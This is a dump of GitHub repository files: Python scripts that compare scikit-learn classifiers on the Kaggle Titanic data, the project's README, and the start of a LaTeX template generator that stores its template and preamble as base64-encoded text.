rbf\": [SVC, {'kernel': 'rbf', 'random_state': 0}],\n # \"SVM poly\": [SVC, {'kernel': 'poly', 'random_state': 0}],\n # \"SVM sigmoid\": [SVC, {'kernel': 'sigmoid', 'random_state': 0}],\n # \"SVM precomputed\": [SVC, {'kernel': 'precomputed', 'random_state': 0}],\n # \"SVM linear\": [SVC, {'kernel': 'linear', 'random_state': 0}],\n \"Naive Bayes\": [GaussianNB, {}],\n \"Decision Tree\": [DecisionTreeClassifier, {'criterion': \"entropy\",\n 'random_state': 0}]\n ,\n \"Random Forest\": [RandomForestClassifier,\n {'n_estimators': 10,\n 'criterion': 'entropy',\n 'random_state': 0}]\n}\n# generate threads for multiple ML algorithms\nlen_algorithms = classifiers.__len__()\n# count of all columns in data\nlen_cols = len(df_prep.columns)\nstart_nbr_f = 1\nend_nbr_f = df_prep.columns.__len__()\n# end_nbr_f = 3\nnbr_tests = sum(\n len(list(itertools.combinations(range(len_cols), nbr_features))) for\n nbr_features in range(start_nbr_f, end_nbr_f + 1)\n) * len_algorithms\n\n# generate the threads of classifiers\nthreads = []\nqueue = Queue()\nfor nbr_features in range(start_nbr_f, end_nbr_f + 1):\n for indexes_cols in itertools.combinations(range(len_cols), nbr_features):\n columns = [col for index, col in enumerate(df_prep.columns)\n if index in indexes_cols]\n # generate the input and target of train and test\n x = df_prep[columns].values.astype(np.float64)\n x_train, x_test, y_train, y_test = train_test_split(\n x,\n y_target,\n test_size=0.25,\n random_state=0\n )\n\n # get indexes of type objects\n indexes_object_cols = [\n index for index, col in enumerate(columns) if col in object_cols\n ]\n\n # use dummy variables for columns of types object\n if indexes_object_cols:\n onehotencoder = OneHotEncoder(\n categorical_features=indexes_object_cols\n )\n x_train = onehotencoder.fit_transform(x_train).toarray()\n x_test = onehotencoder.transform(x_test).toarray()\n\n # Feature Scaling\n sc = StandardScaler()\n x_train = sc.fit_transform(x_train)\n x_test = sc.transform(x_test)\n\n for name_classifier, [classifier, params] in classifiers.items():\n # extract columns\n # Start generate model\n # print(name_classifier)\n threads.append(Thread(\n target=thread_classifier,\n args=(\n classifier(**params), name_classifier, columns,\n x_train, x_test, y_train, y_test,\n queue, nbr_tests\n )\n ))\n\n# start threads and wait all results\n_ = [thread.start() for thread in threads]\n_ = [thread.join() for thread in threads]\nresults = [queue.get() for thread in threads]\n\n# sort and view results\nmax_accuracy = max([d['accuracy'] for d in results])\nbest_classifier = min(\n filter(lambda d: d['accuracy'] == max_accuracy, results),\n key=lambda d: len(d['features'])\n)\n\nend_time = time()\n\nprint(\"\\nThe best classifier is %s\" % best_classifier['algorithm'])\nprint(\"The accuracy : %.2f %%\" % (max_accuracy * 100.))\nprint(\"The columns : %s\" % best_classifier['features'])\nprint(\"The duration of execution : %s\" %\n strftime(\"%H hours %M minutes %S seconds\", gmtime(end_time - start_time))\n )\nprint(\"Number of tests = %d tests\" % results.__len__())\n"
},
{
"alpha_fraction": 0.5879218578338623,
"alphanum_fraction": 0.5914742350578308,
"avg_line_length": 34.1875,
"blob_id": "5010d33bfd5410809939721c1f779c8dbfd73e62",
"content_id": "bd6ac770d4504466e16860daf432b159490d4db8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 16,
"path": "/README.md",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "##################################################################\n###### Titanic: Machine Learning from Disaster, USA DATASET ######\n##################################################################\n\nThis project is about predict survival on the Titanic and get familiar\nwith ML basics.\n\nIt's a great dataset for evaluating simple classification models.\n\nfor more details visit the website:\nhttps://www.kaggle.com/c/titanic\nNB : It's an Prediction Competition in kaggle\n\nThe source code in Python version 3.6\n\nYou can install the packages with requirements.txt\n"
},
{
"alpha_fraction": 0.6072536706924438,
"alphanum_fraction": 0.6136728525161743,
"avg_line_length": 35.51171875,
"blob_id": "b33541e0ef8a60bdc05fb8d7d0f52cc34706093e",
"content_id": "edc5282f6c47f9c9b034b06f8686f9f76b4ee075",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9347,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 256,
"path": "/classification.py",
"repo_name": "suno09/Titanic",
"src_encoding": "UTF-8",
"text": "import itertools\nimport re\nimport sys\nimport pickle\nfrom time import time, strftime, gmtime\nfrom copy import deepcopy\n\nimport numpy as np\nimport pandas as pd\n# from sklearn.cross_validation import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import KFold, cross_val_score\n\nstart_time = time()\n\n# * Data preprocessing\n# read csv file train and test\ndataframe = pd.read_csv('data/train.csv')\n\n# Create column NameType(Mr, Mrs, ...) from Name\ndataframe['NameType'] = [\n re.sub(r'.+?, (.+?)\\..*', r'\\1', name) for name in dataframe.Name\n]\ndataframe.NameType = dataframe.NameType.replace(\n ['Sir', 'Capt', 'Major', 'Don', 'Rev', 'Jonkheer', 'Col'],\n \"Mr\"\n)\ndataframe.NameType = dataframe.NameType.replace(\n ['Mlle', 'Lady', 'Mme', 'Miss', 'Mrs', 'the Countess', 'Dona'],\n \"Ms\"\n)\n\n# replace row contains sex = female and nameType = Dr by Ms\ndataframe.loc[\n (dataframe.Sex == \"female\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Ms\"\n# replace row contains sex = male and nameType = Dr by Mr\ndataframe.loc[\n (dataframe.Sex == \"male\") & (dataframe.NameType == \"Dr\"), 'NameType'\n] = \"Mr\"\n\n# create family size\ndataframe['FamilySize'] = dataframe.SibSp + dataframe.Parch\n# Fare per passenger (fare per ticket)\ndataframe['FarePerPerson'] = dataframe.Fare / (dataframe.FamilySize + 1)\n\n# replace the NaN with \"Unknown\"\ndataframe.Cabin.fillna('', inplace=True)\n# create the count of Cabin\ndataframe['CabinCount'] = dataframe.Cabin.apply(\n lambda c: len(str(c).strip().split())\n)\n# create the number of Cabin (nbr after the letter)\n# (if exist one or more of cabins so get the first else 0)\ndataframe['NbrOfCabin'] = dataframe.Cabin.apply(\n lambda cs: list(filter(\n lambda c: len(c) > 1, str(cs).strip().split()\n ))\n)\ndataframe.NbrOfCabin = [\n int(c[0][1:]) if c != [] else 0 for c in dataframe.NbrOfCabin\n]\n# Create Column and take the first letter of the cabin and\ndataframe['CabinType'] = dataframe.Cabin\ndataframe.CabinType = [c[0] if c else 'U' for c in dataframe.CabinType]\n# person per Cabin\ndataframe['PersonPerCabin'] = (dataframe.FamilySize + 1) / dataframe.CabinCount\ndataframe.loc[\n dataframe.PersonPerCabin == np.inf, 'PersonPerCabin'\n] = dataframe.loc[dataframe.PersonPerCabin == np.inf, 'FamilySize']\n# Fare of cabin\ndataframe['FareOfCabin'] = dataframe.Fare / dataframe.CabinCount\ndataframe.loc[\n (dataframe.FareOfCabin == np.inf) | dataframe.FareOfCabin.isnull(),\n 'FareOfCabin'\n] = 0\n# # Create column and set the cabin by position\n# A = best pos, ..., G = worst pos, U = worst pos\n# cabin_pos = {v: 1./k for k, v in enumerate(\n# ['T', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'U'], 1)}\n# dataframe['CabinPos'] = [cabin_pos[c] for c in dataframe.CabinType]\n\n#\ndataframe.Age = dataframe.groupby([\"NameType\"]).transform(\n lambda a: a.fillna(a.mean())\n).Age\n#\ndataframe.Embarked.fillna('U', inplace=True)\n\n# the new dataframe with deleting some columns\ndf_prep = dataframe.drop(\n ['PassengerId', 'Name', 'Ticket', 'Cabin'],\n axis=1\n)\n\n# get the list of target Survived\ny = df_prep.Survived.values\ndf_prep = df_prep.drop(['Survived'], axis=1)\n\n# get the cols of type \"object\"\n# object_cols = ['Sex', 'Embarked', 'NameType', 'CabinType']\nobject_cols = df_prep.select_dtypes(\"object\").columns\n# Convert the categorical data to numbers\nlabel_encoders = {}\nfor obj_col in object_cols:\n label_encoder = LabelEncoder()\n label_encoder.fit(df_prep[obj_col])\n df_prep[[obj_col]] = df_prep[[obj_col]].apply(label_encoder.transform)\n label_encoders[obj_col] = label_encoder\n\n# generate the classifiers\n# key : name of algorithm\n# value : list of size 2 which contains algorithm and params of algo\nclassifiers = {\n \"Logistic Regression\": [LogisticRegression, {'random_state': 0}],\n \"KNN\": [KNeighborsClassifier,\n {'n_neighbors': 1, 'metric': 'minkowski', 'p': 2}],\n \"SVM rbf\": [SVC, {'kernel': 'rbf', 'random_state': 0}],\n \"SVM poly\": [SVC, {'kernel': 'poly', 'random_state': 0}],\n \"SVM sigmoid\": [SVC, {'kernel': 'sigmoid', 'random_state': 0}],\n \"SVM precomputed\": [SVC, {'kernel': 'precomputed', 'random_state': 0}],\n \"SVM linear\": [SVC, {'kernel': 'linear', 'random_state': 0}],\n \"Naive Bayes\": [GaussianNB, {}],\n \"Decision Tree\": [DecisionTreeClassifier, {'criterion': \"entropy\",\n 'random_state': 0}],\n \"Random Forest\": [RandomForestClassifier,\n {'n_estimators': 10,\n 'criterion': 'entropy',\n 'random_state': 0}]\n}\nlen_algorithms = classifiers.__len__()\n# count of all columns in data\nlen_cols = len(df_prep.columns)\nend_nbr_f = df_prep.columns.__len__()\n# end_nbr_f = 3\nstart_nbr_f = end_nbr_f // 5 + 1\n# start_nbr_f = start_nbr_f if start_nbr_f != 0 else 1\nnbr_tests = sum(\n len(list(itertools.combinations(range(len_cols), nbr_features))) for\n nbr_features in range(start_nbr_f, end_nbr_f + 1)\n) * len_algorithms\n\n# use K fold\nkf = KFold(n_splits=9)\n\n# classifiers = {\n# \"Logistic Regression\": LogisticRegression(**{'random_state': 0}),\n# \"KNN\": KNeighborsClassifier(\n# **{'n_neighbors': 5, 'metric': 'minkowski', 'p': 2}),\n# \"SVM\": SVC(**{'kernel': 'rbf', 'random_state': 0}),\n# \"Naive Bayes\": GaussianNB(),\n# \"Decision Tree\": DecisionTreeClassifier(**{'criterion': \"entropy\",\n# 'random_state': 0})\n# ,\n# \"Random Forest\": RandomForestClassifier(**\n# {'n_estimators': 10,\n# 'criterion': 'entropy',\n# 'random_state': 0})\n# }\n\nresults = []\n\n# generate classifiers\nfor nbr_features in range(start_nbr_f, end_nbr_f + 1):\n for indexes_cols in itertools.combinations(range(len_cols), nbr_features):\n columns = [col for index, col in enumerate(df_prep.columns)\n if index in indexes_cols]\n x = df_prep[columns].values.astype(np.float64)\n\n # get indexes of type objects\n indexes_object_cols = [index for index, col in enumerate(columns)\n if col in object_cols]\n\n # use dummy variables for columns of types object\n if indexes_object_cols:\n onehotencoder = OneHotEncoder(\n categorical_features=indexes_object_cols\n )\n x = onehotencoder.fit_transform(x).toarray()\n # x_test = onehotencoder.transform(x_test).toarray()\n else:\n onehotencoder = None\n\n # Feature Scaling\n sc = StandardScaler()\n x = sc.fit_transform(x)\n # x_test = sc.transform(x_test)\n\n for name_classifier, [classifier, params] in classifiers.items():\n # extract columns\n # Start generate model\n # print(name_classifier, columns)\n ml_classifier = classifier(**params)\n scores = cross_val_score(ml_classifier, x, y, cv=kf)\n # print(name_classifier, \" => \", scores)\n # ml_classifier.fit(x_train, y_train)\n\n # save the result\n # print(name_classifier)\n results.append({\n \"x_y\": [x, y],\n \"dummy_var\": onehotencoder,\n \"feature_scaling\": sc,\n \"classifier\": ml_classifier,\n \"features\": list(columns),\n \"algorithm\": name_classifier,\n \"accuracy\": max(scores)\n })\n\n # print the progression\n progress_value = results.__len__() * 100. / nbr_tests\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Progression |%-50s| %.2f %% (%s)\" %\n (\"\\u2588\" * int(progress_value / 2.),\n progress_value,\n strftime(\"%H:%M:%S\", gmtime(time() - start_time))\n )\n )\n sys.stdout.flush()\n\n# sort and view results\nmax_accuracy = max([d['accuracy'] for d in results])\nbest_classifier = min(\n filter(lambda d: d['accuracy'] == max_accuracy, results),\n key=lambda d: len(d['features'])\n)\n\nend_time = time()\n\nprint(\"\\nThe best classifier is %s\" % best_classifier['algorithm'])\nprint(\"The accuracy : %.2f %%\" % (max_accuracy * 100.))\nprint(\"The columns : %s\" % best_classifier['features'])\nprint(\"The duration of execution : %s\" %\n strftime(\"%H hours %M minutes %S seconds\", gmtime(end_time - start_time))\n )\nprint(\"Number of tests = %d tests\" % results.__len__())\n\n# add the test data to best classifier\nx, y = best_classifier['x_y']\nbest_classifier['classifier'].fit(x, y)\n\n# save label encoders\nbest_classifier['label_encoders'] = label_encoders\n\n# Save best classifier to pickle as dictionary\nwith open('best_classifier.pik', 'wb') as wp:\n pickle.dump(best_classifier, wp)\n"
}
] | 4 |
CarlsenSmart/LaTeX-Preamble_and_Examples
|
https://github.com/CarlsenSmart/LaTeX-Preamble_and_Examples
|
8631476098365d516cfff01ec45998f366fc8e79
|
cafd2cdae856b1aff35f014e97cf3a90c97d2fdc
|
83444d6bdaa6dd5a860afc7462142d03ec53cd65
|
refs/heads/master
| 2021-01-21T06:24:43.098318 | 2017-02-25T12:25:45 | 2017-02-25T12:25:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6765249371528625,
"alphanum_fraction": 0.6816081404685974,
"avg_line_length": 35.06666564941406,
"blob_id": "a98d5100b04103e9335b768afafe955a519d7f9d",
"content_id": "0bccfa983605939b7359deb811641ee939d1ac04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2164,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 60,
"path": "/python/latexgen.py",
"repo_name": "CarlsenSmart/LaTeX-Preamble_and_Examples",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport base64\nimport argparse\ntemplate = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIExvYWQgUHJlYW1wbGUgICAgICAgICAlCiUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUKClxkb2N1bWVudGNsYXNzW2E0LCBlbmdsaXNoXXthcnRpY2xl\nfQoKJUltcG9ydCBmcm9tIHRoZSBzYW1lIGZvbGRlcgolXGlucHV0e3ByZWFtYmxlX2VuLnRleH0K\nCiVJbXBvcnQgZnJvbSBhYnNvbHV0ZSBwYXRoCiVcdXNlcGFja2FnZXtpbXBvcnR9CiVcaW1wb3J0\ne0M6L0dpdEh1Yi9MYVRlWF9QcmVhbWJsZV9hbmRfRXhhbXBsZXMvcHJlYW1ibGUvfXtwcmVhbWJs\nZV9kay50ZXh9CgolSW1wb3J0IGZyb20gYSByZWxhdGl2ZSBwYXRoClx1c2VwYWNrYWdle2ltcG9y\ndH0KXHN1YmltcG9ydHsuLi9wcmVhbWJsZS99e3ByZWFtYmxlX2VuLnRleH0KCiUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUKJSBEb2N1bWVudCBzdGFydHMgaGVyZSEgJQolJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlCgpcYmVnaW57ZG9jdW1lbnR9CgolIERlZmluZSB0aXRsZSBhbmQgbW9yZSBvbiBm\ncm9udHBhZ2UKCVxzZXR0aXRsZXtUaXRsZX17U3VidGl0bGV9CiAgICBcYWRkYXV0aHtTdGVmZmFu\nIFPDuGx2c3Rlbn17MjAxNTA1ODMyQHBvc3QuYXUuZGt9e1wsIGF1NTM0MDY4fQpcbWFrZXRpdGxl\nCgpcYmVnaW57YWJzdHJhY3R9Clxub2luZGVudApMb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldCwg\nY29uc2VjdGV0dXIgYWRpcGlzY2luZyBlbGl0LCBzZWQgZG8gZWl1c21vZCB0ZW1wb3IgaW5jaWRp\nZHVudCB1dCBsYWJvcmUgZXQgZG9sb3JlIG1hZ25hIGFsaXF1YS4gVXQgZW5pbSBhZCBtaW5pbSB2\nZW5pYW0sIHF1aXMgbm9zdHJ1ZCBleGVyY2l0YXRpb24gdWxsYW1jbyBsYWJvcmlzIG5pc2kgdXQg\nYWxpcXVpcCBleCBlYSBjb21tb2RvIGNvbnNlcXVhdC4KXGVuZHthYnN0cmFjdH0KClx0YWJsZW9m\nY29udGVudHMKClxuZXdwYWdlClxzZWN0aW9ue0ludHJvZHVjdGlvbn0gXGxhYmVse3NlYzppbnRy\nb30KTG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFkaXBpc2NpbmcgZWxp\ndCwgc2VkIGRvIGVpdXNtb2QgdGVtcG9yIGluY2lkaWR1bnQgdXQgbGFib3JlIGV0IGRvbG9yZSBt\nYWduYSBhbGlxdWEuIFV0IGVuaW0gYWQgbWluaW0gdmVuaWFtLCBxdWlzIG5vc3RydWQgZXhlcmNp\ndGF0aW9uIHVsbGFtY28gbGFib3JpcyBuaXNpIHV0IGFsaXF1aXAgZXggZWEgY29tbW9kbyBjb25z\nZXF1YXQuCgoKClxiZWdpbnt0aGViaWJsaW9ncmFwaHl9ezl9ClxiaWJpdGVte2JpYml0ZW19CglM\nYXN0LCBGaXJzdDogXGVtcGh7VGl0bGV9LCBwdWJsaWNhdGlvbiwgZWRpdGlvbiwgeWVhcgpcZW5k\ne3RoZWJpYmxpb2dyYXBoeX0KXGJpYmxpb2dyYXBoeXN0eWxle2FiYnJ2fQpcYmlibGlvZ3JhcGh5\ne3JlZmVyZW5jZXJ9CgpcbmV3cGFnZQpcYXBwZW5kaXgKXHNlY3Rpb257QXBwZW5kaXh9CkxvcmVt\nIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQsIHNlZCBk\nbyBlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xvcmUgbWFnbmEgYWxp\ncXVhLiBVdCBlbmltIGFkIG1pbmltIHZlbmlhbSwgcXVpcyBub3N0cnVkIGV4ZXJjaXRhdGlvbiB1\nbGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8gY29uc2VxdWF0LgoK\nXGVuZHtkb2N1bWVudH0=\n\"\"\"\npreamble_base = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICBQYXBlcnNpemUgYW5kIGVuY29k\naW5nICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgU2l6ZSBvZiBtYXJn\naW5zIGNhbiBiZSBjaGFuZ2VkIGhlcmUgaW4gdGhlIG91dGNvbW1lbnRlZCB2ZXJzaW9uIQolXHVz\nZXBhY2thZ2VbYTRwYXBlciwgdG90YWw9ezZpbiwgOGlufV17Z2VvbWV0cnl9CSV0b3RhbD17d2lk\ndGgsIGhlaWdodH0KXHVzZXBhY2thZ2VbYTRwYXBlcl17Z2VvbWV0cnl9CgolIEJhc2ljczogZm9u\ndCwgY29kZWMgZXRjLgpcdXNlcGFja2FnZVt1dGY4XXtpbnB1dGVuY30JCQkJCQklIGVuY29kaW5n\nOiB1dGYtOCAobm9yZGljIGxldHRlcnMpClx1c2VwYWNrYWdlW1QxXXtmb250ZW5jfQkJCQkJCSUg\ndXNlIDgtYml0IGVuY29kZWQgZm9udHMKXHJlbmV3Y29tbWFuZHtcc2ZkZWZhdWx0fXtwaHZ9CQkJ\nCQklIGNoYW5nZXMgdGhlIGRlZmF1bHQgZm9udAoKJVx1c2VwYWNrYWdlW3BhcmZpbGxde3BhcnNr\naXB9ICAgICAgJUluc3RlYWQgb2YgaW5kZW50aW5nIG9uIGEgbmV3bGluZSBhZGRzIHdoaXRlc3Bh\nY2UKCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIFRhYmxlcyBhbmQg\nZmlndXJlcyAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKClx1c2VwYWNr\nYWdle3RhYnVsYXJ4LGJvb2t0YWJzLGF1dGhibGt9CQkgICAgJSB2YXJpb3VzIGJhc2ljIHN0dWZm\nIGZvciB0YWJsZXMgYW5kIG1vcmUKCiUgRmlndXJlcyBhbmQgY2FwdGlvbnMKXHVzZXBhY2thZ2V7\nY2FwdGlvbn0JCQkJCQkJJSBjcmVhdGUgY2FwdGlvbnMgZm9yIGZpZ3VyZXMKXHVzZXBhY2thZ2V7\nc3ViZmlnfQkJCQkJCQkJJSBjcmVhdGUgc3ViZmlndXJlcyBvZiBhIGZpZ3VyZQolXHVzZXBhY2th\nZ2V7c3ViY2FwdGlvbn0JCQkJCSUgY3JlYXRlIGNhcHRpb25zIGZvciBzdWJmaWd1cmVzCiAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAlICAgICBjdXJyZW50bHkgb2ZmLCBkdWUgdG8g\nY29uZmxpY3RzCgpcdXNlcGFja2FnZXt3cmFwZmlnfQkJCQkJCQklIGxldHRpbmcgZmlndXJlcyBi\nZSBpbiB0ZXh0CgpcdXNlcGFja2FnZXtyb3RhdGluZ30gICAgICAgICAgICAgJSBsZXQgYW55IGVu\ndmlyb25tZW50IGJlIHJvdGF0ZWQgKGZpZ3VyZXMgc2lkZXdheXMpCiAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAlICAgICBcYmVnaW57c2lkZXdheXN9IG9yIFxiZWdpbnt0dXJufXsz\nMH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICAgICAgIFZh\ncmlhYmxlcyAgICAgICAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUKXHVzZXBhY2thZ2V7cGdma2V5c30JCQklSW5pdGlhbGl6ZSB0aGUgdmFyaWFibGUga2V5LXZh\nbHVlIHBhcmlycwoKXG5ld2NvbW1hbmR7XHNldHZhbHVlfVsxXXtccGdma2V5c3svdmFyaWFibGVz\nLyMxfX0KXG5ld2NvbW1hbmR7XGdldHZhbHVlfVsxXXtccGdma2V5c3ZhbHVlb2Z7L3ZhcmlhYmxl\ncy8jMX19ClxuZXdjb21tYW5ke1xkZWNsYXJlfVsxXXslCiBccGdma2V5c3sKICAvdmFyaWFibGVz\nLyMxLmlzIGZhbWlseSwKICAvdmFyaWFibGVzLyMxLnVua25vd24vLnN0eWxlID0ge1xwZ2ZrZXlz\nY3VycmVudHBhdGgvXHBnZmtleXNjdXJyZW50bmFtZS8uaW5pdGlhbCA9ICMjMX0KIH0lCn0KClxk\nZWNsYXJle30KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIExhVGVY\nIFByb2dyYW1taW5nICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKClx1\nc2VwYWNrYWdle3hwYXJzZX0JCQkJCQkJCSUgU2Nhbm5pbmcgYXJndW1lbnRzClx1c2VwYWNrYWdl\ne2lmdGhlbn0JCQkJCQkJCSUgQ29uZGl0aW9uYWxzClx1c2VwYWNrYWdle2NhbGN9CQkJCQkJCQkl\nIENhbGN1bGF0aW9ucwoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAg\nICAgIEh5cGVybWVkaWEgICAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJQoKXHVzZXBhY2thZ2V7dXJsLCBoeXBlcnJlZn0JCQkJCQklIFx1cmx7bGlua30gLyBcaHJlZnts\naW5rfXtyZXBsYWNpbmcgdGV4dH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUK\nJSAgICAgICAgIFN0eWxpemF0aW9uICAgICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUKCiUgSGVhZGVycyBvZyBmb290ZXJzClx1c2VwYWNrYWdle2xhc3RwYWdlfSAgICAg\nICAgICAgICAgICAgICAgICAgICAgICUgXGxhc3RwYWdlIGNvbW1hbmQgZm9yIG51bWJlcnMgb2Yg\ncGFnZXMKXHVzZXBhY2thZ2V7ZmFuY3loZHJ9ICAgICAgICAgICAgICAgICAgICAgICAgICAgJSBj\ncmVhdGUgY29vbCBoZWFkZXJzIGFuZCBmb290ZXJzClxwYWdlc3R5bGV7ZmFuY3l9ICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICUgd2hvIGRvZXNuJ3Qgd2FudCB0aGVpciBwYWdlIHRvIGJl\nIGZhbmN5PwoKJSBVc2Ugb2YgY29sdW1ucwpcdXNlcGFja2FnZXttdWx0aWNvbH0KCiUgUXVvdGF0\naW9ucwolICJkYW5pc2giIG9yICJicml0aXNoIgpcdXNlcGFja2FnZVtkYW5pc2g9Z3VpbGxlbWV0\nc117Y3NxdW90ZXN9ICAgIAklIHR3byBzdHlsZXM6ICJxdW90ZXMiIG9yID4+Z3VpbGxlbWV0czw8\nCiVcTWFrZUF1dG9RdW90ZXvCu317wqt9ICAgICAgICAgICAgICAgICAgICAgICAJJSBkZWNvbW1l\nbnQgZm9yIGVhc3kgbWFjcm8KJVxNYWtlQXV0b1F1b3RlKnvigLp9e+KAuX0gICAgICAgICAgICAg\nICAgICAgICAgCSUgZGVjb21tZW50IGZvciBldmVuIGVhc2llciBtYWNyb3MKCgoKJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgICAgICAgICBNYXRoICAgICAgICAgICAgICUK\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgdmFyaW91cyBiYXNpYyBzdHVmZgpc\ndXNlcGFja2FnZXtibSwgbWF0aHRvb2xzLCBhbXNtYXRofQoKJSBWYXJpb3VzIHN5bWJvbCBwYWNr\nYWdlcwolXHVzZXBhY2thZ2V7YW1zc3ltYn0KXHVzZXBhY2thZ2VbdXRvcGlhXXttYXRoZGVzaWdu\nfQkJCQkJCSUgZnVsbCBvdmVyd3JpdGUgb2YgdGhlIGZvbnQgc3lzdGVtClx1c2VwYWNrYWdle3N0\nbWFyeXJkfQkJCQkJCQkJJSBldmVuIG1vcmUgc3ltYm9scwoKXGxldFxtYXRoY2FsXHVuZGVmaW5l\nZAkJCQkJCQkJJSBMZXQncyByZWRlZmluZSB0aGUgbWF0aGNhbCBhbHBoYWJldApcRGVjbGFyZU1h\ndGhBbHBoYWJldHtcbWF0aGNhbH17T01TfXtjbXN5fXttfXtufQoKJSBNYXRoIHNob3J0Y3V0cwpc\ncmVuZXdjb21tYW5ke1xkfXtcLCBcbWF0aHJte2R9fSAgICAgICAgICAgICAgICAgICAgJSBcZCA9\nIGRpZmZlcmVudGlhbCBkIHdpdGggYSBiaXQgb2Ygc3BhY2luZwpcbmV3Y29tbWFuZHtcZX17XG1h\ndGhybXtlfX0gICAgICAgICAgICAgICAgICAgICAgICAgJSBcZSA9IGV1bGVycyBudW1iZXIKXG5l\nd2NvbW1hbmR7XFJ9e1xtYXRoYmJ7Un19ICAgICAgICAgICAgICAgICAgICAgICAgICUgXFIgPSBS\nZWFsIG51bWJlcnMKXG5ld2NvbW1hbmR7XE59e1xtYXRoYmJ7Tn19ICAgICAgICAgICAgICAgICAg\nICAgICAgICUgXE4gPSBOYXR1cmFsIG51bWJlcnMKXG5ld2NvbW1hbmR7XEN9e1xtYXRoYmJ7Q319\nICAgICAgICAgICAgICAgICAgICAgICAgICUgXEMgPSBDb21wbGV4IG51bWJlcnMKXG5ld2NvbW1h\nbmR7XFF9e1xtYXRoYmJ7UX19ICAgICAgICAgICAgICAgICAgICAgICAgICUgXFEgPSBSYXRpb25h\nbCBudW1iZXJzClxuZXdjb21tYW5ke1xGfXtcbWF0aGJie0Z9fQkJCQkJCQklIFxGCgpcRGVjbGFy\nZVBhaXJlZERlbGltaXRlclxjZWlse1xsY2VpbH17XHJjZWlsfSAgICAgICAgJSBcY2VpbHthcmd9\nCVxjZWlsKnthcmd9IGZvciBhdXRvbWF0aWMgc2NhbGluZwpcRGVjbGFyZVBhaXJlZERlbGltaXRl\nclxmbG9vcntcbGZsb29yfXtccmZsb29yfSAgICAgJSBcZmxvb3J7YXJnfQlcZmxvb3Iqe2FyZ30g\nZm9yIGF1dG9tYXRpYyBzY2FsaW5nClxEZWNsYXJlUGFpcmVkRGVsaW1pdGVyXGFic3tcbHZlcnR9\ne1xydmVydH0gICAgICAgICAlIFxhYnN7YXJnfQkJXGFicyp7YXJnfSBmb3IgYXV0b21hdGljIHNj\nYWxpbmcKClxuZXdjb3VudGVye2l9CgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcc2VxIHsgZyBn\nIGcgZyB9IHsJCQklIFxzZXF7eH17aX17an17c30KCVxzZXRjb3VudGVye2l9ezB9CQkJCQkJCQkl\nIHhfaSwgeF9pK3MsIC4uLiB4X2oKCVxJZlZhbHVlVCB7IzJ9IHsgXGFkZHRvY291bnRlcntpfXsj\nMn0gfQoJXElmVmFsdWVURiB7IzF9CgkJeyMxfQoJCXt4fQoJX3sgXGFyYWJpY3tpfSB9LAoJXElm\nVmFsdWVURiB7IzR9IAoJCXtcYWRkdG9jb3VudGVye2l9eyM0fX0KCQl7XGFkZHRvY291bnRlcntp\nfXsxfX0KCVxJZlZhbHVlVEYgeyMxfSAKCQl7IzF9